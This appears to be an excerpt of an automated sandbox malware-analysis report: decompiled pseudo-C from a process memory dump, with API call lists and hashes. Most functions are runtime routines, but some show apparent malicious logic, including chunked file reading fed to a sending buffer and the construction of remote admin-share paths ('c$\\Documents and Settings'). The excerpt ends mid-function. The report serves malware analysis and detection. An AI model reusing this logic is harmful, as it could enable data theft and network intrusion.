                                                • EnterCriticalSection.KERNEL32(?), ref: 02FA8CF4
                                                • LeaveCriticalSection.KERNEL32(?,00000400), ref: 02FA8D11
                                                • EnterCriticalSection.KERNEL32(?), ref: 02FA8D1B
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Enter$InitializeLeave
                                                • String ID:
                                                • API String ID: 2951591641-0
                                                • Opcode ID: 28b0b53784966506b38c2f723d2eac693cc7c94ce461553c03041989dda387b2
                                                • Instruction ID: ef80923bf368c0bf10a3c82b978ab813d9f0d02b400b0d03b7cccb70cae36ba2
                                                • Opcode Fuzzy Hash: 28b0b53784966506b38c2f723d2eac693cc7c94ce461553c03041989dda387b2
                                                • Instruction Fuzzy Hash: CA61B2B0E40209EFCB14DFA4D9A4BAEBBBAFF05394F144519E616E7280DB74A901CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E02FA88D0(intOrPtr* __ecx) {
                                                				intOrPtr* _v8;
                                                				long _v12;
                                                				long _v16;
                                                				struct _SECURITY_ATTRIBUTES* _t34;
                                                				CHAR* _t36;
                                                				void* _t37;
                                                				intOrPtr _t39;
                                                				intOrPtr* _t41;
                                                				void* _t43;
                                                				struct _SECURITY_ATTRIBUTES* _t44;
                                                				long _t45;
                                                
                                                				_t44 = 0;
                                                				_t36 = __ecx + 0x110;
                                                				_v8 = __ecx;
                                                				_t43 = CreateFileA(_t36, 0x80000000, 1, 0, 3, 0x80, 0);
                                                				if(_t43 != 0xffffffff) {
                                                					L3:
                                                					_t39 = _v8;
                                                					_t4 = _t39 + 8; // 0x2fa8e40
                                                					_t5 = _t39 + 0xc; // 0x2fa8ec0
                                                					_t45 =  *_t5;
                                                					_v12 =  *_t4;
                                                					SetFilePointer(_t43, _t45,  &_v12, 0);
                                                					_t37 = LocalAlloc(0x40, 0x19000);
                                                					_t9 = _t37 + 9; // 0x9
                                                					 *_t37 = 0x33;
                                                					 *((intOrPtr*)(_t37 + 1)) = _v12;
                                                					 *(_t37 + 5) = _t45;
                                                					_v16 = 0;
                                                					ReadFile(_t43, _t9, 0x18ff7,  &_v16, 0);
                                                					CloseHandle(_t43);
                                                					_t27 = _v16;
                                                					_t41 = _v8;
                                                					if(_v16 == 0) {
                                                						 *((intOrPtr*)( *((intOrPtr*)( *_t41)) + 0x18))();
                                                						return LocalFree(_t37);
                                                					}
                                                					E02FA8A40(_t41, _t27 + 9, _t37, _t27 + 9);
                                                					return LocalFree(_t37);
                                                				} else {
                                                					while(1) {
                                                						_t34 = _t44;
                                                						_t44 =  &(_t44->nLength);
                                                						if(_t34 > 0xa) {
                                                							break;
                                                						}
                                                						Sleep(0x12c);
                                                						_t43 = CreateFileA(_t36, 0x80000000, 1, 0, 3, 0x80, 0);
                                                						if(_t43 == 0xffffffff) {
                                                							continue;
                                                						} else {
                                                							goto L3;
                                                						}
                                                						goto L7;
                                                					}
                                                					return _t34;
                                                				}
                                                				L7:
                                                 			}

                                                APIs
                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,02FC4635,?,02FA8D80), ref: 02FA88F7
                                                • Sleep.KERNEL32(0000012C,?,02FA8D80), ref: 02FA8915
                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,02FA8D80), ref: 02FA892E
                                                • SetFilePointer.KERNEL32(00000000,02FA8EC0,02FA8D80,00000000,?,02FA8D80), ref: 02FA894F
                                                • LocalAlloc.KERNEL32(00000040,00019000,?,02FA8D80), ref: 02FA895C
                                                • ReadFile.KERNEL32(00000000,00000009,00018FF7,?,00000000), ref: 02FA8987
                                                • CloseHandle.KERNEL32(00000000), ref: 02FA898E
                                                • LocalFree.KERNEL32(00000000,00000000,-00000009), ref: 02FA89A9
                                                • LocalFree.KERNEL32(00000000), ref: 02FA89BE
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: File$Local$CreateFree$AllocCloseHandlePointerReadSleep
                                                • String ID:
                                                • API String ID: 2044486136-0
                                                • Opcode ID: 2fb97733889873a8f1b45f3a24cb3356ce0bd0564d1d417b90685412c896b065
                                                • Instruction ID: 584fa0e10e4e39f597534a35e4c5169a9e529c77707783dde8c684f37ef6f3e9
                                                • Opcode Fuzzy Hash: 2fb97733889873a8f1b45f3a24cb3356ce0bd0564d1d417b90685412c896b065
                                                • Instruction Fuzzy Hash: 8631D971B40208BFD7109B64DC9DF9ABB7CEB097A0F204555FB05EB2C0C6B0A511C761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 69%
                                                			E02FBA40F(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                				signed int _v8;
                                                				int _v12;
                                                				void* _v24;
                                                				void* __esi;
                                                				signed int _t49;
                                                				signed int _t54;
                                                				int _t58;
                                                				signed int _t60;
                                                				short* _t62;
                                                				signed int _t66;
                                                				short* _t70;
                                                				int _t71;
                                                				int _t78;
                                                				short* _t81;
                                                				signed int _t87;
                                                				signed int _t90;
                                                				void* _t95;
                                                				void* _t96;
                                                				int _t98;
                                                				short* _t101;
                                                				int _t103;
                                                				void* _t104;
                                                				signed int _t106;
                                                				short* _t107;
                                                				void* _t110;
                                                
                                                				_push(__ecx);
                                                				_push(__ecx);
                                                				_t49 =  *0x2fcf008; // 0x93ad1eea
                                                				_v8 = _t49 ^ _t106;
                                                				_t103 = _a20;
                                                				if(_t103 > 0) {
                                                					_t78 = E02FC002B(_a16, _t103);
                                                					_t110 = _t78 - _t103;
                                                					_t4 = _t78 + 1; // 0x1
                                                					_t103 = _t4;
                                                					if(_t110 >= 0) {
                                                						_t103 = _t78;
                                                					}
                                                				}
                                                				_t98 = _a32;
                                                				if(_t98 == 0) {
                                                					_t98 =  *( *_a4 + 8);
                                                					_a32 = _t98;
                                                				}
                                                				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                                                				_v12 = _t54;
                                                				if(_t54 == 0) {
                                                					L38:
                                                					_pop(_t104);
                                                					return E02FB0A5D(_v8 ^ _t106, _t104);
                                                				} else {
                                                					_t95 = _t54 + _t54;
                                                					_t85 = _t95 + 8;
                                                					asm("sbb eax, eax");
                                                					if((_t95 + 0x00000008 & _t54) == 0) {
                                                						_t81 = 0;
                                                						__eflags = 0;
                                                						L14:
                                                						if(_t81 == 0) {
                                                							L36:
                                                							_t105 = 0;
                                                							L37:
                                                							E02FBA677(_t81);
                                                							goto L38;
                                                						}
                                                						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                                                						_t121 = _t58;
                                                						if(_t58 == 0) {
                                                							goto L36;
                                                						}
                                                						_t100 = _v12;
                                                						_t60 = E02FB7FD8(_t85, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                                                						_t105 = _t60;
                                                						if(_t105 == 0) {
                                                							goto L36;
                                                						}
                                                						if((_a12 & 0x00000400) == 0) {
                                                							_t96 = _t105 + _t105;
                                                							_t87 = _t96 + 8;
                                                							__eflags = _t96 - _t87;
                                                							asm("sbb eax, eax");
                                                							__eflags = _t87 & _t60;
                                                							if((_t87 & _t60) == 0) {
                                                								_t101 = 0;
                                                								__eflags = 0;
                                                								L30:
                                                								__eflags = _t101;
                                                								if(__eflags == 0) {
                                                									L35:
                                                									E02FBA677(_t101);
                                                									goto L36;
                                                								}
                                                								_t62 = E02FB7FD8(_t87, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                                                								__eflags = _t62;
                                                								if(_t62 == 0) {
                                                									goto L35;
                                                								}
                                                								_push(0);
                                                								_push(0);
                                                								__eflags = _a28;
                                                								if(_a28 != 0) {
                                                									_push(_a28);
                                                									_push(_a24);
                                                								} else {
                                                									_push(0);
                                                									_push(0);
                                                								}
                                                								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                                                								__eflags = _t105;
                                                								if(_t105 != 0) {
                                                									E02FBA677(_t101);
                                                									goto L37;
                                                								} else {
                                                									goto L35;
                                                								}
                                                							}
                                                							_t90 = _t96 + 8;
                                                							__eflags = _t96 - _t90;
                                                							asm("sbb eax, eax");
                                                							_t66 = _t60 & _t90;
                                                							_t87 = _t96 + 8;
                                                							__eflags = _t66 - 0x400;
                                                							if(_t66 > 0x400) {
                                                								__eflags = _t96 - _t87;
                                                								asm("sbb eax, eax");
                                                								_t101 = E02FB7882(_t87, _t66 & _t87);
                                                								_pop(_t87);
                                                								__eflags = _t101;
                                                								if(_t101 == 0) {
                                                									goto L35;
                                                								}
                                                								 *_t101 = 0xdddd;
                                                								L28:
                                                								_t101 =  &(_t101[4]);
                                                								goto L30;
                                                							}
                                                							__eflags = _t96 - _t87;
                                                							asm("sbb eax, eax");
                                                							E02FC3C70();
                                                							_t101 = _t107;
                                                							__eflags = _t101;
                                                							if(_t101 == 0) {
                                                								goto L35;
                                                							}
                                                							 *_t101 = 0xcccc;
                                                							goto L28;
                                                						}
                                                						_t70 = _a28;
                                                						if(_t70 == 0) {
                                                							goto L37;
                                                						}
                                                						_t125 = _t105 - _t70;
                                                						if(_t105 > _t70) {
                                                							goto L36;
                                                						}
                                                						_t71 = E02FB7FD8(0, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                                                						_t105 = _t71;
                                                						if(_t71 != 0) {
                                                							goto L37;
                                                						}
                                                						goto L36;
                                                					}
                                                					asm("sbb eax, eax");
                                                					_t72 = _t54 & _t95 + 0x00000008;
                                                					_t85 = _t95 + 8;
                                                					if((_t54 & _t95 + 0x00000008) > 0x400) {
                                                						__eflags = _t95 - _t85;
                                                						asm("sbb eax, eax");
                                                						_t81 = E02FB7882(_t85, _t72 & _t85);
                                                						_pop(_t85);
                                                						__eflags = _t81;
                                                						if(__eflags == 0) {
                                                							goto L36;
                                                						}
                                                						 *_t81 = 0xdddd;
                                                						L12:
                                                						_t81 =  &(_t81[4]);
                                                						goto L14;
                                                					}
                                                					asm("sbb eax, eax");
                                                					E02FC3C70();
                                                					_t81 = _t107;
                                                					if(_t81 == 0) {
                                                						goto L36;
                                                					}
                                                					 *_t81 = 0xcccc;
                                                					goto L12;
                                                				}
                                                 			}

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,77109EB0,?,?,?,?,?,02FBA660,00000001,00000001,?), ref: 02FBA469
                                                • __alloca_probe_16.LIBCMT ref: 02FBA4A1
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,02FBA660,00000001,00000001,?,02FD0E80,?,?), ref: 02FBA4EF
                                                • __alloca_probe_16.LIBCMT ref: 02FBA586
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,02FD0E80,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02FBA5E9
                                                • __freea.LIBCMT ref: 02FBA5F6
                                                  • Part of subcall function 02FB7882: RtlAllocateHeap.NTDLL(00000000,77109EB0,00000000,?,02FB0A9A,77109EB0,?,02FA9C60,00000100,?,77109EB0), ref: 02FB78B4
                                                • __freea.LIBCMT ref: 02FBA5FF
                                                • __freea.LIBCMT ref: 02FBA624
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                • String ID:
                                                • API String ID: 3864826663-0
                                                • Opcode ID: 095f8e1dbf311c14c108df507a543fe88cfaaa11ec79992c0e2f5d14eb0dd728
                                                • Instruction ID: 056453c494bf870544d49c0361b1a4546c5093122cd40b309aba09e6d1228122
                                                • Opcode Fuzzy Hash: 095f8e1dbf311c14c108df507a543fe88cfaaa11ec79992c0e2f5d14eb0dd728
                                                • Instruction Fuzzy Hash: AC51CE72A00216AFDB269E76CD44EEF77AAEF44794F144628FE04D6250EB35DD80CA90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 74%
                                                			E02FBD142(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				signed char _v15;
                                                				char _v16;
                                                				void _v24;
                                                				short _v28;
                                                				char _v31;
                                                				void _v32;
                                                				long _v36;
                                                				intOrPtr _v40;
                                                				void* _v44;
                                                				signed int _v48;
                                                				signed char* _v52;
                                                				long _v56;
                                                				int _v60;
                                                				void* __esi;
                                                				signed int _t78;
                                                				signed int _t80;
                                                				int _t86;
                                                				void* _t94;
                                                				long _t97;
                                                				void _t105;
                                                				void* _t112;
                                                				signed int _t116;
                                                				signed int _t118;
                                                				signed char _t123;
                                                				signed char _t128;
                                                				intOrPtr _t129;
                                                				signed int _t131;
                                                				signed char* _t133;
                                                				intOrPtr* _t134;
                                                				signed int _t135;
                                                				void* _t136;
                                                
                                                				_t78 =  *0x2fcf008; // 0x93ad1eea
                                                				_v8 = _t78 ^ _t135;
                                                				_t80 = _a8;
                                                				_t118 = _t80 >> 6;
                                                				_t116 = (_t80 & 0x0000003f) * 0x30;
                                                				_t133 = _a12;
                                                				_v52 = _t133;
                                                				_v48 = _t118;
                                                				_t9 = _t116 + 0x18; // 0xcccccccc
                                                				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x2fd6480 + _t118 * 4)) + _t9));
                                                				_v40 = _a16 + _t133;
                                                				_t86 = GetConsoleCP();
                                                				_t134 = _a4;
                                                				_v60 = _t86;
                                                				 *_t134 = 0;
                                                				 *((intOrPtr*)(_t134 + 4)) = 0;
                                                				 *((intOrPtr*)(_t134 + 8)) = 0;
                                                				while(_t133 < _v40) {
                                                					_v28 = 0;
                                                					_v31 =  *_t133;
                                                					_t129 =  *((intOrPtr*)(0x2fd6480 + _v48 * 4));
                                                					_t123 =  *(_t129 + _t116 + 0x2d);
                                                					if((_t123 & 0x00000004) == 0) {
                                                						if(( *(E02FBC178(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                							_push(1);
                                                							_push(_t133);
                                                							goto L8;
                                                						} else {
                                                							if(_t133 >= _v40) {
                                                								_t131 = _v48;
                                                								 *((char*)( *((intOrPtr*)(0x2fd6480 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                                                								 *( *((intOrPtr*)(0x2fd6480 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x2fd6480 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                                                								 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 4)) + 1;
                                                							} else {
                                                								_t112 = E02FB8950( &_v28, _t133, 2);
                                                								_t136 = _t136 + 0xc;
                                                								if(_t112 != 0xffffffff) {
                                                									_t133 =  &(_t133[1]);
                                                									goto L9;
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						_t128 = _t123 & 0x000000fb;
                                                						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                                                						_push(2);
                                                						_v15 = _t128;
                                                						 *(_t129 + _t116 + 0x2d) = _t128;
                                                						_push( &_v16);
                                                						L8:
                                                						_push( &_v28);
                                                						_t94 = E02FB8950();
                                                						_t136 = _t136 + 0xc;
                                                						if(_t94 != 0xffffffff) {
                                                							L9:
                                                							_t133 =  &(_t133[1]);
                                                							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                							_v56 = _t97;
                                                							if(_t97 != 0) {
                                                								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                                									L19:
                                                									 *_t134 = GetLastError();
                                                								} else {
                                                									 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 8)) - _v52 + _t133;
                                                									if(_v36 >= _v56) {
                                                										if(_v31 != 0xa) {
                                                											goto L16;
                                                										} else {
                                                											_t105 = 0xd;
                                                											_v32 = _t105;
                                                											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                												goto L19;
                                                											} else {
                                                												if(_v36 >= 1) {
                                                													 *((intOrPtr*)(_t134 + 8)) =  *((intOrPtr*)(_t134 + 8)) + 1;
                                                													 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 4)) + 1;
                                                													goto L16;
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                					goto L20;
                                                					L16:
                                                				}
                                                				L20:
                                                				return E02FB0A5D(_v8 ^ _t135, _t134);
                                                			}

                                                APIs
                                                • GetConsoleCP.KERNEL32(00000010,02FA971E,08A10000,?,?,?,?,?,?,02FBD8B7,00000000,02FA971E,00000010,02FA971E,02FA971E,?), ref: 02FBD184
                                                • __fassign.LIBCMT ref: 02FBD1FF
                                                • __fassign.LIBCMT ref: 02FBD21A
                                                • WideCharToMultiByte.KERNEL32(?,00000000,02FA971E,00000001,00000010,00000005,00000000,00000000), ref: 02FBD240
                                                • WriteFile.KERNEL32(?,00000010,00000000,02FBD8B7,00000000,?,?,?,?,?,?,?,?,?,02FBD8B7,00000000), ref: 02FBD25F
                                                • WriteFile.KERNEL32(?,00000000,00000001,02FBD8B7,00000000,?,?,?,?,?,?,?,?,?,02FBD8B7,00000000), ref: 02FBD298
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                • String ID:
                                                • API String ID: 1324828854-0
                                                • Opcode ID: f5a10f1b4c131538e923d6ce5d385e21194c9bdbcdd4272640001ab36a2c21ed
                                                • Instruction ID: 5460e5647e5962ba55bee1e9c139396f255748b866fceae62cc44ce335d2f08c
                                                • Opcode Fuzzy Hash: f5a10f1b4c131538e923d6ce5d385e21194c9bdbcdd4272640001ab36a2c21ed
                                                • Instruction Fuzzy Hash: 2A51D071E002499FDB11CFA9D885AEEBBF9FF09340F24451AEA52E7241D730E941CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E02FA8A40(void* __ecx, void* __eflags, intOrPtr _a4, char _a8) {
                                                				long _v8;
                                                				char _v16;
                                                				char _v20;
                                                				struct _CRITICAL_SECTION _v44;
                                                				long _v48;
                                                				long _v52;
                                                				void* _v56;
                                                				char _v60;
                                                				signed int _t45;
                                                				char _t53;
                                                				void* _t60;
                                                				void* _t84;
                                                				void* _t96;
                                                				void* _t100;
                                                				signed int _t102;
                                                
                                                				_push(0xffffffff);
                                                				_push(E02FC46F8);
                                                				_push( *[fs:0x0]);
                                                				_t45 =  *0x2fcf008; // 0x93ad1eea
                                                				_push(_t45 ^ _t102);
                                                				 *[fs:0x0] =  &_v16;
                                                				_t96 = __ecx;
                                                				_v60 = 0x2fccab8;
                                                				_v48 = 0;
                                                				_v56 = 0;
                                                				_v52 = 0;
                                                				InitializeCriticalSection( &_v44);
                                                				_v8 = 0;
                                                				EnterCriticalSection( &_v44);
                                                				_v52 = _v56;
                                                				E02FA8840( &_v60, 0x400);
                                                				LeaveCriticalSection( &_v44);
                                                				_t53 = _a8;
                                                				if(_t53 == 0 || _a4 == 0) {
                                                					EnterCriticalSection( &_v44);
                                                					_t28 = ( ==  ? 0 : _v52 - _v56) + 5; // 0x5
                                                					if(E02FA87B0( &_v60, _t28) != 0xffffffff) {
                                                						_t31 = _t96 + 0x214; // 0x2a0073
                                                						 *_v52 =  *_t31;
                                                						_t33 = _t96 + 0x218; // 0x0
                                                						 *((char*)(_v52 + 4)) =  *_t33;
                                                						_v52 = _v52 + 5;
                                                					}
                                                					LeaveCriticalSection( &_v44);
                                                				} else {
                                                					_v20 = _t53 + 0xd;
                                                					_t17 = _t96 + 0x214; // 0x2fccccc
                                                					E02FA8690( &_v60, _t17, 5);
                                                					E02FA8690( &_v60,  &_v20, 4);
                                                					E02FA8690( &_v60,  &_a8, 4);
                                                					E02FA8690( &_v60, _a4, _a8);
                                                				}
                                                				_t82 =  ==  ? 0 : _v52 - _v56;
                                                				_push( ==  ? 0 : _v52 - _v56);
                                                				_t60 = E02FA89D0(_t96, _v56,  ==  ? 0 : _v52 - _v56);
                                                				_t84 = _v56;
                                                				_t100 = _t60;
                                                				_v60 = 0x2fccab8;
                                                				if(_t84 != 0) {
                                                					VirtualFree(_t84, 0, 0x8000);
                                                				}
                                                				DeleteCriticalSection( &_v44);
                                                				 *[fs:0x0] = _v16;
                                                				return _t100;
                                                			}

                                                APIs
                                                • InitializeCriticalSection.KERNEL32(?), ref: 02FA8A89
                                                • EnterCriticalSection.KERNEL32(?), ref: 02FA8A9A
                                                • LeaveCriticalSection.KERNEL32(?,00000400), ref: 02FA8ABD
                                                • EnterCriticalSection.KERNEL32(?), ref: 02FA8B13
                                                • LeaveCriticalSection.KERNEL32(?,00000005), ref: 02FA8B58
                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00000000), ref: 02FA8B8B
                                                • DeleteCriticalSection.KERNEL32(?,00000000,00000000,00000000), ref: 02FA8B95
                                                  • Part of subcall function 02FA8690: EnterCriticalSection.KERNEL32(?,?,?,?,?,02FA8C1E,?,02FA7B57,93AD1EEA,73B76490,00000000,?), ref: 02FA869C
                                                  • Part of subcall function 02FA8690: LeaveCriticalSection.KERNEL32(?,?,?,02FA8C1E,?,02FA7B57,93AD1EEA,73B76490,00000000,?), ref: 02FA86C5
                                                  • Part of subcall function 02FA8690: LeaveCriticalSection.KERNEL32(?,73B76490,00000000,?,?,?,?,?,?,?,?,?,02FC4728,000000FF,?,02FA7B57), ref: 02FA86E7
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Leave$Enter$DeleteFreeInitializeVirtual
                                                • String ID:
                                                • API String ID: 2514474324-0
                                                • Opcode ID: c272e2c12bf652c3b7dbcdaf5a97af17e39c38f60ba65d1d63d5d448c1813864
                                                • Instruction ID: 17b95802528478b926cbd7a80afdb79ae48931f9c5704ebcdf7095469f707a52
                                                • Opcode Fuzzy Hash: c272e2c12bf652c3b7dbcdaf5a97af17e39c38f60ba65d1d63d5d448c1813864
                                                • Instruction Fuzzy Hash: 17411BB5E4020DABDB04DFA8D9A8BDEBBB9BF08790F14451AF615E7280DB74A504CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E02FBC425(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                				signed int _v8;
                                                				int _v12;
                                                				char _v16;
                                                				intOrPtr _v24;
                                                				char _v28;
                                                				void* _v40;
                                                				void* __esi;
                                                				signed int _t34;
                                                				signed int _t40;
                                                				int _t46;
                                                				int _t53;
                                                				void* _t55;
                                                				int _t57;
                                                				signed int _t63;
                                                				int _t67;
                                                				short* _t68;
                                                				signed int _t69;
                                                				short* _t70;
                                                
                                                				_t34 =  *0x2fcf008; // 0x93ad1eea
                                                				_v8 = _t34 ^ _t69;
                                                				E02FB4970(__ebx,  &_v28, __edx, _a4);
                                                				_t57 = _a24;
                                                				if(_t57 == 0) {
                                                					_t53 =  *(_v24 + 8);
                                                					_t57 = _t53;
                                                					_a24 = _t53;
                                                				}
                                                				_t67 = 0;
                                                				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                				_v12 = _t40;
                                                				if(_t40 == 0) {
                                                					L15:
                                                					if(_v16 != 0) {
                                                						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                					}
                                                					return E02FB0A5D(_v8 ^ _t69, _t68);
                                                				}
                                                				_t55 = _t40 + _t40;
                                                				_t17 = _t55 + 8; // 0x2fd0e88
                                                				asm("sbb eax, eax");
                                                				if((_t17 & _t40) == 0) {
                                                					_t68 = 0;
                                                					L11:
                                                					if(_t68 != 0) {
                                                						E02FB3440(_t67, _t68, _t67, _t55);
                                                						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t68, _v12);
                                                						if(_t46 != 0) {
                                                							_t67 = GetStringTypeW(_a8, _t68, _t46, _a20);
                                                						}
                                                					}
                                                					L14:
                                                					E02FBA677(_t68);
                                                					goto L15;
                                                				}
                                                				_t20 = _t55 + 8; // 0x2fd0e88
                                                				asm("sbb eax, eax");
                                                				_t48 = _t40 & _t20;
                                                				_t21 = _t55 + 8; // 0x2fd0e88
                                                				_t63 = _t21;
                                                				if((_t40 & _t20) > 0x400) {
                                                					asm("sbb eax, eax");
                                                					_t68 = E02FB7882(_t63, _t48 & _t63);
                                                					if(_t68 == 0) {
                                                						goto L14;
                                                					}
                                                					 *_t68 = 0xdddd;
                                                					L9:
                                                					_t68 =  &(_t68[4]);
                                                					goto L11;
                                                				}
                                                				asm("sbb eax, eax");
                                                				E02FC3C70();
                                                				_t68 = _t70;
                                                				if(_t68 == 0) {
                                                					goto L14;
                                                				}
                                                				 *_t68 = 0xcccc;
                                                				goto L9;
                                                 			}

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(123,00000000,?,?,00000000,00000000,?,77109EB0,?,123,00000001,?,?,00000001,?,?), ref: 02FBC472
                                                • __alloca_probe_16.LIBCMT ref: 02FBC4AA
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02FBC4FB
                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02FBC50D
                                                • __freea.LIBCMT ref: 02FBC516
                                                  • Part of subcall function 02FB7882: RtlAllocateHeap.NTDLL(00000000,77109EB0,00000000,?,02FB0A9A,77109EB0,?,02FA9C60,00000100,?,77109EB0), ref: 02FB78B4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                • String ID: 123
                                                • API String ID: 313313983-2286445522
                                                • Opcode ID: 163e6b8e079a7f4389f347fce7b0ab9d2114389a77fb7dfe24da1720c0e23f03
                                                • Instruction ID: 968d2841e792adceddb9bd921636cdc339a2da6936017d1fa1cc7453a57cfee4
                                                • Opcode Fuzzy Hash: 163e6b8e079a7f4389f347fce7b0ab9d2114389a77fb7dfe24da1720c0e23f03
                                                • Instruction Fuzzy Hash: A931CD72A0020AAFDB269F66DC44EEF7BA5EF00794B14016AED04D7250EB35DD50CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 55%
                                                			E02FAAC00(void* __ebx, char* __ecx, void* __edi, signed int _a8) {
                                                				signed int _v8;
                                                				char _v2052;
                                                				short _v2060;
                                                				char _v2564;
                                                				short _v2572;
                                                				char _v3098;
                                                				void _v3100;
                                                				char _v3340;
                                                				char _v3348;
                                                				char _v3352;
                                                				short _v3356;
                                                				intOrPtr _v3360;
                                                				void* __esi;
                                                				signed int _t22;
                                                				int _t26;
                                                				void* _t30;
                                                				void* _t48;
                                                				char* _t65;
                                                				void* _t66;
                                                				void* _t68;
                                                				signed int _t69;
                                                				signed int _t71;
                                                				void* _t72;
                                                
                                                				_t71 = (_t69 & 0xfffffff8) - 0xd1c;
                                                				_t22 =  *0x2fcf008; // 0x93ad1eea
                                                				_v8 = _t22 ^ _t71;
                                                				_push(__edi);
                                                				_t65 = __ecx;
                                                				E02FB3440(__edi,  &_v3356, 0, 0x100);
                                                				_t60 = MultiByteToWideChar;
                                                				_t72 = _t71 + 0xc;
                                                				_t26 = MultiByteToWideChar(0, 0, _t65, 0xffffffff, 0, 0);
                                                				if(_t26 <= 0x80) {
                                                					MultiByteToWideChar(0, 0, _t65, 0xffffffff,  &_v3356, _t26);
                                                				}
                                                				_t48 = L"c$\\Documents and Settings\\";
                                                				_v3360 = 4;
                                                				do {
                                                					E02FB3440(_t60,  &_v3098, 0, 0x206);
                                                					_t66 = _t48;
                                                					_t30 = memcpy( &_v3100, _t66, 0x40 << 2);
                                                					_t60 = _t66 + 0x80;
                                                					E02FB3440(_t66 + 0x80, _t30, 0, 0x800);
                                                					wsprintfW( &_v2060, L"\\\\%ws\\%ws",  &_v3356,  &_v3100);
                                                					E02FAAA40(_t48,  &_v2052,  &_v3348, _t66 + 0x80);
                                                					_t72 = _t72 + 0x34;
